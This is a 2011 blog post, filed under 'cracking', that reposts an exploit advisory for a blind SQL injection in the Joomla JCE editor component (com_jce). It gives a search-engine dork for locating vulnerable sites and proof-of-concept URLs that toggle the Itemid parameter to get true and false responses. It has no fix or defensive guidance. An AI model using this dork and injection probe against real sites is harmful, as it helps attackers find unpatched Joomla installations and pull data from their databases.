BLIND sql injection vulnerability

Posted: April 11, 2011 in Analysis, cracking


joomlacontenteditor (com_jce) BLIND sql injection vulnerability


Software: joomlacontenteditor (com_jce)


Vuln Type: BLind SQL Injection

Download link:
oomla-15-2 (check here)

Author: eidelweiss

contact: eidelweiss[at]windowslive[dot]com


Dork: inurl:”/index.php?option=com_jce”




JCE makes creating and editing Joomla!®

content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,

without limitations, and without needing to know or learn HTML, XHTML, CSS…


exploit & p0c

[!] index.php?option=com_jce&Itemid=[valid Itemid]

Example p0c

[!] http://host/index.php?option=com_jce&Itemid=8 <= True

[!] http://host/index.php?option=com_jce&Itemid=-8 <= False


Nothing Impossible In This World Even Nobody`s Perfect



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s